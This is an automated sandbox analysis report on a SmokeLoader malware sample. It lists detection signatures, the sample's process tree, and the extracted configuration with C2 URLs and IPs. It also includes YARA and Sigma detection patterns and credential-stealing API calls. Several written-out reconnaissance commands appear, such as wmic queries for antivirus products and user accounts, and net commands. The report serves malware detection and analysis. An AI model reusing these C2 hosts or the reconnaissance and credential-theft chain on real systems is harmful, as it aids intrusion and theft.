Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ctMI3TYXpX.exe

Overview

General Information

Sample name:ctMI3TYXpX.exe
renamed because original name is a hash value
Original sample name:a27775738faff754dcf5c3e8e42b9838.exe
Analysis ID:1528581
MD5:a27775738faff754dcf5c3e8e42b9838
SHA1:ef3bcdfbc99ca65cf6ae2b550da3b9c4451db2a7
SHA256:ba8fcbecaf19e5da453aafbcb716c6ba46980d64ad1c86ce17cee7426c042bcc
Tags:exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the windows firewall
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ctMI3TYXpX.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\ctMI3TYXpX.exe" MD5: A27775738FAFF754DCF5C3E8E42B9838)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 35DB.exe (PID: 7964 cmdline: C:\Users\user\AppData\Local\Temp\35DB.exe MD5: 366910063EF4A518B6ADF6D28C7B2C69)
      • B972.exe (PID: 2104 cmdline: C:\Users\user\AppData\Local\Temp\B972.exe MD5: 65AEAA0A0849CB3CE9BC15BCBF0B7B9F)
        • cmd.exe (PID: 396 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 5752 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3336 cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5572 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 7620 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3412 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3060 cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 2200 cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6252 cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6452 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6804 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 7004 cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1740 cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1712 cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 7788 cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • ipconfig.exe (PID: 1284 cmdline: ipconfig /displaydns MD5: 62F170FB07FDBB79CEB7147101406EB8)
          • ROUTE.EXE (PID: 3912 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
          • netsh.exe (PID: 1432 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • systeminfo.exe (PID: 2872 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • tasklist.exe (PID: 7792 cmdline: tasklist /v /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • net.exe (PID: 5948 cmdline: net accounts /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 928 cmdline: C:\Windows\system32\net1 accounts /domain MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
          • net.exe (PID: 5104 cmdline: net share MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 5296 cmdline: C:\Windows\system32\net1 share MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
          • net.exe (PID: 2908 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • explorer.exe (PID: 6796 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 7496 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 5804 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 7524 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 5088 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 4092 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • jghruer (PID: 7756 cmdline: C:\Users\user\AppData\Roaming\jghruer MD5: A27775738FAFF754DCF5C3E8E42B9838)
  • hdhruer (PID: 8148 cmdline: C:\Users\user\AppData\Roaming\hdhruer MD5: 366910063EF4A518B6ADF6D28C7B2C69)
  • msiexec.exe (PID: 5436 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2574353685.00000000004A0000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x1236f:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.2327173692.00000000005B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1726159167.00000000004B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    Click to see the 23 entries

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Execution of Suspicious File Type Extension
    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\jghruer, CommandLine: C:\Users\user\AppData\Roaming\jghruer, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\jghruer, NewProcessName: C:\Users\user\AppData\Roaming\jghruer, OriginalFileName: C:\Users\user\AppData\Roaming\jghruer, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\jghruer, ProcessId: 7756, ProcessName: jghruer
    Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
    Source: Process startedAuthor: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net accounts /domain, CommandLine: net accounts /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 396, ParentProcessName: cmd.exe, ProcessCommandLine: net accounts /domain, ProcessId: 5948, ProcessName: net.exe
    Sigma detected: Local Accounts Discovery
    Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 396, ParentProcessName: cmd.exe, ProcessCommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , ProcessId: 7004, ProcessName: WMIC.exe
    Sigma detected: Net.exe Execution
    Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net accounts /domain, CommandLine: net accounts /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 396, ParentProcessName: cmd.exe, ProcessCommandLine: net accounts /domain, ProcessId: 5948, ProcessName: net.exe
    Sigma detected: Suspicious Network Command
    Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: route print, CommandLine: route print, CommandLine|base64offset|contains: , Image: C:\Windows\System32\ROUTE.EXE, NewProcessName: C:\Windows\System32\ROUTE.EXE, OriginalFileName: C:\Windows\System32\ROUTE.EXE, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 396, ParentProcessName: cmd.exe, ProcessCommandLine: route print, ProcessId: 3912, ProcessName: ROUTE.EXE

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T03:14:22.194672+020020391031A Network Trojan was detected192.168.2.449736180.75.11.13380TCP
    2024-10-08T03:14:23.607928+020020391031A Network Trojan was detected192.168.2.449737180.75.11.13380TCP
    2024-10-08T03:14:24.986323+020020391031A Network Trojan was detected192.168.2.449738180.75.11.13380TCP
    2024-10-08T03:14:26.372379+020020391031A Network Trojan was detected192.168.2.449739180.75.11.13380TCP
    2024-10-08T03:14:27.804881+020020391031A Network Trojan was detected192.168.2.449740180.75.11.13380TCP
    2024-10-08T03:14:29.188524+020020391031A Network Trojan was detected192.168.2.449741180.75.11.13380TCP
    2024-10-08T03:14:30.567066+020020391031A Network Trojan was detected192.168.2.449742180.75.11.13380TCP
    2024-10-08T03:14:31.967427+020020391031A Network Trojan was detected192.168.2.449743180.75.11.13380TCP
    2024-10-08T03:14:33.349888+020020391031A Network Trojan was detected192.168.2.449744180.75.11.13380TCP
    2024-10-08T03:14:34.724537+020020391031A Network Trojan was detected192.168.2.449745180.75.11.13380TCP
    2024-10-08T03:14:36.129091+020020391031A Network Trojan was detected192.168.2.449746180.75.11.13380TCP
    2024-10-08T03:14:37.511221+020020391031A Network Trojan was detected192.168.2.449747180.75.11.13380TCP
    2024-10-08T03:14:38.888606+020020391031A Network Trojan was detected192.168.2.449748180.75.11.13380TCP
    2024-10-08T03:14:40.294985+020020391031A Network Trojan was detected192.168.2.449749180.75.11.13380TCP
    2024-10-08T03:14:41.687004+020020391031A Network Trojan was detected192.168.2.449750180.75.11.13380TCP
    2024-10-08T03:14:43.070323+020020391031A Network Trojan was detected192.168.2.449751180.75.11.13380TCP
    2024-10-08T03:14:44.453846+020020391031A Network Trojan was detected192.168.2.449752180.75.11.13380TCP
    2024-10-08T03:14:46.078180+020020391031A Network Trojan was detected192.168.2.449753180.75.11.13380TCP
    2024-10-08T03:14:47.954405+020020391031A Network Trojan was detected192.168.2.449754180.75.11.13380TCP
    2024-10-08T03:14:49.384205+020020391031A Network Trojan was detected192.168.2.449755180.75.11.13380TCP
    2024-10-08T03:14:50.822470+020020391031A Network Trojan was detected192.168.2.449756180.75.11.13380TCP
    2024-10-08T03:14:52.232319+020020391031A Network Trojan was detected192.168.2.449758180.75.11.13380TCP
    2024-10-08T03:14:53.619316+020020391031A Network Trojan was detected192.168.2.449759180.75.11.13380TCP
    2024-10-08T03:14:55.012096+020020391031A Network Trojan was detected192.168.2.449760180.75.11.13380TCP
    2024-10-08T03:14:57.758027+020020391031A Network Trojan was detected192.168.2.449773180.75.11.13380TCP
    2024-10-08T03:14:59.141611+020020391031A Network Trojan was detected192.168.2.449784180.75.11.13380TCP
    2024-10-08T03:15:00.543733+020020391031A Network Trojan was detected192.168.2.449795180.75.11.13380TCP
    2024-10-08T03:15:01.943079+020020391031A Network Trojan was detected192.168.2.449803180.75.11.13380TCP
    2024-10-08T03:15:03.347158+020020391031A Network Trojan was detected192.168.2.449812180.75.11.13380TCP
    2024-10-08T03:15:04.734946+020020391031A Network Trojan was detected192.168.2.449822180.75.11.13380TCP
    2024-10-08T03:15:06.122207+020020391031A Network Trojan was detected192.168.2.449831180.75.11.13380TCP
    2024-10-08T03:15:07.506497+020020391031A Network Trojan was detected192.168.2.449841180.75.11.13380TCP
    2024-10-08T03:15:19.207418+020020391031A Network Trojan was detected192.168.2.44991523.145.40.168443TCP
    2024-10-08T03:15:20.940399+020020391031A Network Trojan was detected192.168.2.44992423.145.40.168443TCP
    2024-10-08T03:15:21.924039+020020391031A Network Trojan was detected192.168.2.44993523.145.40.168443TCP
    2024-10-08T03:15:23.127857+020020391031A Network Trojan was detected192.168.2.44994223.145.40.168443TCP
    2024-10-08T03:15:24.007314+020020391031A Network Trojan was detected192.168.2.44995123.145.40.168443TCP
    2024-10-08T03:15:24.904929+020020391031A Network Trojan was detected192.168.2.44995923.145.40.168443TCP
    2024-10-08T03:15:25.814603+020020391031A Network Trojan was detected192.168.2.44996523.145.40.168443TCP
    2024-10-08T03:15:26.719338+020020391031A Network Trojan was detected192.168.2.44997123.145.40.168443TCP
    2024-10-08T03:15:27.642402+020020391031A Network Trojan was detected192.168.2.44997723.145.40.168443TCP
    2024-10-08T03:15:28.579765+020020391031A Network Trojan was detected192.168.2.44998323.145.40.168443TCP
    2024-10-08T03:15:29.478717+020020391031A Network Trojan was detected192.168.2.44998923.145.40.168443TCP
    2024-10-08T03:15:30.411627+020020391031A Network Trojan was detected192.168.2.44999523.145.40.168443TCP
    2024-10-08T03:15:31.283857+020020391031A Network Trojan was detected192.168.2.45000123.145.40.168443TCP
    2024-10-08T03:15:32.191015+020020391031A Network Trojan was detected192.168.2.45000823.145.40.168443TCP
    2024-10-08T03:15:33.069306+020020391031A Network Trojan was detected192.168.2.45001523.145.40.168443TCP
    2024-10-08T03:15:33.957275+020020391031A Network Trojan was detected192.168.2.45002423.145.40.168443TCP
    2024-10-08T03:15:34.867331+020020391031A Network Trojan was detected192.168.2.45003023.145.40.168443TCP
    2024-10-08T03:15:36.316479+020020391031A Network Trojan was detected192.168.2.45003623.145.40.168443TCP
    2024-10-08T03:15:37.218884+020020391031A Network Trojan was detected192.168.2.45004323.145.40.168443TCP
    2024-10-08T03:15:43.167928+020020391031A Network Trojan was detected192.168.2.45005523.145.40.168443TCP
    2024-10-08T03:16:17.332902+020020391031A Network Trojan was detected192.168.2.450056180.75.11.13380TCP
    2024-10-08T03:16:25.215333+020020391031A Network Trojan was detected192.168.2.450057180.75.11.13380TCP
    2024-10-08T03:16:35.175377+020020391031A Network Trojan was detected192.168.2.450058180.75.11.13380TCP
    2024-10-08T03:16:47.543160+020020391031A Network Trojan was detected192.168.2.450059180.75.11.13380TCP
    2024-10-08T03:16:57.444928+020020391031A Network Trojan was detected192.168.2.45006023.145.40.168443TCP
    2024-10-08T03:16:58.438011+020020391031A Network Trojan was detected192.168.2.45006123.145.40.168443TCP
    2024-10-08T03:17:02.272122+020020391031A Network Trojan was detected192.168.2.450062201.103.8.13580TCP
    2024-10-08T03:17:16.307008+020020391031A Network Trojan was detected192.168.2.45006323.145.40.168443TCP
    2024-10-08T03:17:20.704358+020020391031A Network Trojan was detected192.168.2.450064201.103.8.13580TCP
    2024-10-08T03:17:34.328112+020020391031A Network Trojan was detected192.168.2.45006523.145.40.168443TCP
    2024-10-08T03:17:38.839751+020020391031A Network Trojan was detected192.168.2.450066201.103.8.13580TCP
    2024-10-08T03:17:51.835614+020020391031A Network Trojan was detected192.168.2.45006723.145.40.168443TCP
    2024-10-08T03:17:56.257177+020020391031A Network Trojan was detected192.168.2.450068201.103.8.13580TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T03:18:03.951900+020020190821A Network Trojan was detected192.168.2.45006923.145.40.113443TCP
    2024-10-08T03:18:03.968253+020020190821A Network Trojan was detected192.168.2.45006923.145.40.113443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T03:15:19.556728+020028098821Malware Command and Control Activity Detected192.168.2.44991523.145.40.168443TCP
    2024-10-08T03:15:21.301374+020028098821Malware Command and Control Activity Detected192.168.2.44992423.145.40.168443TCP
    2024-10-08T03:15:22.202449+020028098821Malware Command and Control Activity Detected192.168.2.44993523.145.40.168443TCP
    2024-10-08T03:15:23.407326+020028098821Malware Command and Control Activity Detected192.168.2.44994223.145.40.168443TCP
    2024-10-08T03:15:24.284045+020028098821Malware Command and Control Activity Detected192.168.2.44995123.145.40.168443TCP
    2024-10-08T03:15:25.174280+020028098821Malware Command and Control Activity Detected192.168.2.44995923.145.40.168443TCP
    2024-10-08T03:15:26.096204+020028098821Malware Command and Control Activity Detected192.168.2.44996523.145.40.168443TCP
    2024-10-08T03:15:27.035482+020028098821Malware Command and Control Activity Detected192.168.2.44997123.145.40.168443TCP
    2024-10-08T03:15:27.919881+020028098821Malware Command and Control Activity Detected192.168.2.44997723.145.40.168443TCP
    2024-10-08T03:15:28.860193+020028098821Malware Command and Control Activity Detected192.168.2.44998323.145.40.168443TCP
    2024-10-08T03:15:29.756748+020028098821Malware Command and Control Activity Detected192.168.2.44998923.145.40.168443TCP
    2024-10-08T03:15:30.634802+020028098821Malware Command and Control Activity Detected192.168.2.44999523.145.40.168443TCP
    2024-10-08T03:15:31.568650+020028098821Malware Command and Control Activity Detected192.168.2.45000123.145.40.168443TCP
    2024-10-08T03:15:32.467294+020028098821Malware Command and Control Activity Detected192.168.2.45000823.145.40.168443TCP
    2024-10-08T03:15:33.339954+020028098821Malware Command and Control Activity Detected192.168.2.45001523.145.40.168443TCP
    2024-10-08T03:15:34.238068+020028098821Malware Command and Control Activity Detected192.168.2.45002423.145.40.168443TCP
    2024-10-08T03:15:35.149562+020028098821Malware Command and Control Activity Detected192.168.2.45003023.145.40.168443TCP
    2024-10-08T03:15:36.592551+020028098821Malware Command and Control Activity Detected192.168.2.45003623.145.40.168443TCP
    2024-10-08T03:15:38.491915+020028098821Malware Command and Control Activity Detected192.168.2.45004323.145.40.168443TCP
    2024-10-08T03:16:57.772199+020028098821Malware Command and Control Activity Detected192.168.2.45006023.145.40.168443TCP
    2024-10-08T03:16:58.803947+020028098821Malware Command and Control Activity Detected192.168.2.45006123.145.40.168443TCP
    2024-10-08T03:17:16.585580+020028098821Malware Command and Control Activity Detected192.168.2.45006323.145.40.168443TCP
    2024-10-08T03:17:34.688036+020028098821Malware Command and Control Activity Detected192.168.2.45006523.145.40.168443TCP
    2024-10-08T03:17:52.198933+020028098821Malware Command and Control Activity Detected192.168.2.45006723.145.40.168443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T03:15:19.731852+020028298482Potentially Bad Traffic23.145.40.168443192.168.2.449915TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: ctMI3TYXpX.exeAvira: detected
    Antivirus detection for dropped file
    Source: C:\Users\user\AppData\Roaming\jghruerAvira: detection malicious, Label: HEUR/AGEN.1310247
    Source: C:\Users\user\AppData\Roaming\hdhruerAvira: detection malicious, Label: HEUR/AGEN.1310247
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeAvira: detection malicious, Label: HEUR/AGEN.1310247
    Found malware configuration
    Source: 00000006.00000002.2327201404.00000000005C0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Roaming\jghruerReversingLabs: Detection: 28%
    Multi AV Scanner detection for submitted file
    Source: ctMI3TYXpX.exeReversingLabs: Detection: 28%
    Source: ctMI3TYXpX.exeVirustotal: Detection: 38%Perma Link
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for dropped file
    Source: C:\Users\user\AppData\Local\Temp\B972.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Roaming\jghruerJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Roaming\hdhruerJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeJoe Sandbox ML: detected
    Machine Learning detection for sample
    Source: ctMI3TYXpX.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D63220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,9_2_00007FF6F2D63220
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D636F0 CryptExportKey,CryptExportKey,9_2_00007FF6F2D636F0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02753098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,13_2_02753098
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02753717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,13_2_02753717
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02753E04 RtlCompareMemory,CryptUnprotectData,13_2_02753E04
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_0275123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,13_2_0275123B
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_027511E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,13_2_027511E1
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02751198 CryptBinaryToStringA,CryptBinaryToStringA,13_2_02751198
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02751FCE CryptUnprotectData,RtlMoveMemory,13_2_02751FCE
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0014245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,16_2_0014245E
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00142404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,16_2_00142404
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0014263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,16_2_0014263E
